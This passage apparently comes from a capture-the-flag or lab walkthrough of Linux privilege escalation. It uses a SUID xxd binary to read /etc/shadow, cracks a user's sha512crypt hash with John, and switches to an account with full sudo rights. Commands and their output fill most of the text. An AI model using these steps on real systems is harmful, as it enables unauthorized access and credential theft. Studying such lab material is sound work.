Res
Privilege Escalation
- We can catch the Reverse Shell Using
netcat
www-data@ubuntu html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- The /usr/bin/xxd Binary has the SUID Bit Set.
www-data@ubuntu html$ find / -type f -perm -04000 -ls 2>/dev/null
...
262073 20 -rwsr-xr-x 1 root root 18552 Mar 18 2020 /usr/bin/xxd
...
- We can use
xxdto Read any File on the System
www-data@ubuntu html$ LFILE=/etc/shadow
www-data@ubuntu html$ xxd "$LFILE" | xxd -r
root:!:18507:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18506:0:99999:7:::
uuidd:*:18506:0:99999:7:::
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::
- We can Brute-Force the HASH using
John - Password: beautiful1
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
beautiful1 (vianka)
- Switching to User: vianka with the Cracked Credentials.
www-data@ubuntu html$ su - vianka
Password:
vianka@ubuntu:~$ id
uid=1000(vianka) gid=1000(vianka) groups=1000(vianka),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
- The User: vianka can run any Command as ROOT
vianka@ubuntu:~$ sudo -l
Matching Defaults entries for vianka on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User vianka may run the following commands on ubuntu:
(ALL : ALL) ALL